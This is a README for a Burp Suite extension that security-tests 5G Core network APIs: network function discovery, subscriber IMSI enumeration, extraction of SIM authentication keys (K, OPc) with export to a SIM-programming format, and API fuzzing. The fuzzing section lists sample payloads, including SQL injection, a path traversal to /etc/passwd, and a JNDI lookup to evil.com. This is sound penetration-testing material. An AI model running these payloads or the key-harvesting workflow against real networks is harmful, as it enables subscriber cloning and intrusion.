Burp Suite Extension for 5G Core Network Security Testing
The 5GC API Penetration Testing Suite is a comprehensive Burp Suite extension designed for security testing of 5G Core (5GC) networks. Developed by Penthertz, this tool automates the discovery, enumeration, and exploitation of vulnerabilities in 5G Service-Based Interfaces (SBI).
This tool is a replacement of 5GC API parser Burp suite extension we have release a few years ago.
Author: SΓ©bastien Dudek @Penthertz
Company: Penthertz - RF Security & Telecommunications Security Experts
License: Apache License 2.0
Version: 1.0 Community Edition
Demo5GCAPIpentestSpeed.mp4
- Auto-Audit: A little one-click automatical assessment
- Network Function Discovery: Enumerate all 5GC network functions via NRF
- IMSI Enumeration: Discover active subscribers through UDM API
- Credential Extraction: Extract permanent authentication keys (K, OPc) from UDR
- Vulnerability Detection: Automated security issue identification
- OAuth2 Support: 3GPP TS 29.510 OAuth2 workflow (manual token acquisition)
- mTLS Configuration: Mutual TLS authentication support (beta)
- JWT Bearer Tokens: Automatic token injection into requests
- Production Safety: Rate limiting and request delay controls
- OpenAPI-based Fuzzing: Load 3GPP YAML specs and fuzz endpoints
- Template-based Fuzzing: Use
$$markers$$for precise payload injection - Request/Response Viewer: Detailed HTTP traffic analysis
- Burp Integration: Send requests to Repeater, report to Scanner
- Dashboard: Real-time statistics and quick actions
- Configuration: Complete 5GC network topology setup
- Discovered Assets: NF and IMSI tables with export
- Credentials: Secure credential management and export (JSON, CSV, pySim)
- Security Issues: Detailed vulnerability reports with request/response evidence
- API Fuzzing: Interactive fuzzing with payload categories
- Activity Log: Comprehensive logging with export
- Core NFs: NRF, UDM, UDR, AUSF, AMF, SMF, PCF
- Additional NFs: BSF, NSSF, SMSF, NEF, SCP, SEPP, UPF, and more
- API Versioning: Auto-detection and configuration (v1, v2, v3)
- SCP Proxy: Automatic detection and use of Service Communication Proxy
- Burp Suite Professional (recommended) or Community Edition
- Python/Jython 2.7 (included with Burp Suite)
- Java 8+ (for Burp Suite)
- 5G Core Network (e.g., Open5GS, free5GC, commercial 5GC)
- Network access to 5GC SBI interfaces (typically HTTP on port 7777)
- Optional: OAuth2 server for authentication testing
- Optional: mTLS certificates for mutual authentication
- 3GPP Release 16/17/18 OpenAPI YAML files
- Available from: jdegre/5GC_APIs
git clone https://github.com/PentHertz/5GC_API_pentest
cd 5GC_API_pentestNote: Ensure you have Jython installed in Burp Suite.
- Open Burp Suite
- Navigate to Extender β Extensions
- Click Add
- Set Extension Type to Python
- Select the
5GC_API_Pentest.pyfile - Click Next
The extension should load successfully with output:
======================================================================
5GC API PENTEST SUITE v1.0 - Burp Extension (Community Edition)
Penthertz Security Research
======================================================================
[+] 5GC API Pentest Suite v1.0 (Community Edition) loaded successfully!
A new tab "5GC API Pentest" will appear in Burp Suite.
Go to the Configuration tab:
NRF URL: http://127.0.0.10:7777 <--- At least this one
UDM URL: http://127.0.0.12:7777 (optional)
UDR URL: http://127.0.0.20:7777 (optional)
AUSF URL: http://127.0.0.11:7777 (optional)
AMF URL: http://127.0.0.5:7777 (optional)
SMF URL: http://127.0.0.4:7777 (optional)
Tip: The extension can auto-populate these after NF discovery.
Base IMSI: 999700000000
Start Range: 1
End Range: 100
Workers: 10
Go to the Dashboard tab and click:
π΄ Auto-Audit
This will automatically:
- β Discover all Network Functions
- β Enumerate valid IMSIs
- β Extract authentication credentials
- β Detect security vulnerabilities
- Discovered Assets: View NFs and IMSIs
- Credentials: Extracted K/OPc keys
- Security Issues: Detailed vulnerability reports
The extension implements the 3GPP TS 29.510 OAuth2 specification with a manual token acquisition workflow.
Go to Configuration β OAuth2 / JWT Authentication:
NRF OAuth2 URL: http://127.0.0.10:7777/oauth2/token
NF Instance ID: 12345678-1234-1234-1234-123456789abc
NF Type: AMF
Target NF Type: (optional)
Scope: nnrf-disc nnrf-nfm
Click "Generate OAuth2 Request"
The extension will display:
# CURL COMMAND
curl -X POST 'http://127.0.0.10:7777/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'grant_type=client_credentials&nfInstanceId=...'Option A: Copy curl command and run in terminal
Option B: Click "Send to Burp Repeater" and execute
-
Copy the
access_tokenfrom the JSON response:{ "access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...", "token_type": "Bearer", "expires_in": 3600 } -
Paste the token into "Access Token" field
-
Click "Activate Token" (green button)
Check: β Enable OAuth2 Bearer Token for all requests
All subsequent requests will include:
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
-
Download 3GPP specs:
git clone https://github.com/jdegre/5GC_APIs.git
-
Use
5GC_API_YAML_file_corrector_for_SnakeYAML.pyagainst this repository to fix unicode and other issues, unless it some YAML will not be correctly parsed -
In Burp Suite, go to API Fuzzing tab, click "Load API Directory..."
-
Select the
5GC_APIs/folder
The extension will parse all YAML files and display available APIs.
- Select API: Click on an API (e.g., "Nudm_SDM")
- Select Endpoint: Choose an endpoint (e.g.,
GET /nudm-sdm/v2/imsi-{imsi}/am-data)
A request template will be generated with $$markers$$:
GET /nudm-sdm/v2/imsi-$$imsi$$/am-data HTTP/1.1
Host: $$host$$
Content-Type: application/json
Accept: application/jsonChange markers or other parameters with $$param$$ marker to fuzz them.
Base URL:
http://127.0.0.12:7777
Threads: 5
Delay: 100ms
Option A: Load from file (one payload per line)
Option B: Load by category:
- SQL Injection
- XSS (Cross-Site Scripting)
- Path Traversal
- 5GC Specific - IMSI
Option C: Manual entry:
' OR '1'='1
../../../etc/passwd
999700000000001
${jndi:ldap://evil.com/a}
Click "Start Fuzzing"
The extension will:
- Replace each $$marker$$ generally marked as
$$param$$with payloads - Send requests and analyze responses
- Detect anomalies (errors, injections, large responses)
- Display results in real-time
- Click row to view full request/response
- Right-click β "Send to Repeater" for further testing
- Export results for reporting
JSON Format:
{
"timestamp": "2025-01-15 14:30:00",
"total_credentials": 50,
"credentials": [
{
"imsi": "999700000000001",
"k": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"opc": "E8ED289DEBA952E4283B54E88E6183CA",
"sqn": "000000000001",
"amf": "8000"
}
]
}CSV Format:
IMSI,K,OPc,SQN,AMF,Timestamp
999700000000001,465B5CE8...,E8ED289D...,000000000001,8000,2025-01-15 14:30:00
pySim Format (for SIM card programming):
[
{
"IMSI": "999700000000001",
"Ki": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"OPc": "E8ED289DEBA952E4283B54E88E6183CA",
"ADM1": "00000000",
"ICCID": "8988211000000000001"
}
]Comprehensive JSON report including:
- Network Functions discovered
- IMSIs enumerated
- Credentials extracted
- Security issues with request/response evidence
- Configuration snapshot
Enable PRODUCTION MODE for safe testing:
β PRODUCTION MODE (enables safety features)
Max Requests/Second: 10
Request Delay (ms): 500
Max Concurrent Threads: 3
π’ Stealth Mode (Safe):
- 3 workers, 5 req/s, 500ms delay
- IMSI range: 1-100
- Best for: Production testing
π‘ Balanced Mode (Normal):
- 10 workers, 20 req/s, 100ms delay
- IMSI range: 1-1000
- Best for: Lab testing
π΄ Aggressive Mode (Fast):
- 30 workers, 100 req/s, 10ms delay
- IMSI range: 1-10000
β οΈ Lab environments only!
Auto-detect, or manually configure:
NRF API Version: v1
UDM API Version: v2
UDR API Version: v2
AUSF API Version: v1
Click "Auto-Detect Versions" to automatically identify supported versions.
Scenario: Test if NRF allows unauthenticated network function enumeration
Steps:
- Configure NRF URL
- Dashboard β "Discover NFs"
- Review Discovered Assets tab
- Check Security Issues for "Missing Authentication" vulnerability
Expected Finding: High severity issue if authentication is not required
Scenario: Test if UDM allows IMSI enumeration without authentication
Steps:
- Configure UDM URL and IMSI range
- Dashboard β "Enumerate IMSIs"
- Review discovered IMSIs
- Check for "Privacy Violation" security issue
Expected Finding: High severity if sequential IMSI testing succeeds
Scenario: Test if UDR exposes permanent authentication keys
Steps:
- Run IMSI enumeration first
- Dashboard β "Extract Credentials"
- Review Credentials tab for K/OPc values
- Export credentials for offline analysis
Expected Finding: Critical vulnerability if K/OPc are accessible without authentication
Scenario: Test OAuth2 token workflow and validation
Steps:
- Configure OAuth2 parameters
- Generate and execute token request
- Activate token
- Run attacks with OAuth enabled
- Compare results with/without authentication
Expected Finding: Proper authentication should block unauthorized access
Scenario: Test for SQL/NoSQL injection vulnerabilities
Steps:
- Load 3GPP OpenAPI specs
- Select UDR authentication endpoint
- Load "SQL Injection" payload category
- Start fuzzing
- Review anomalies (500 errors, error disclosure)
Expected Finding: Properly sanitized inputs should not produce errors
Copyright 2025 SΓ©bastien Dudek / Penthertz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
- Open5GS team for open-source 5G Core implementation
- PortSwigger for Burp Suite framework
- jdegre for maintaining 5GC_APIs repository
- The 5G security research community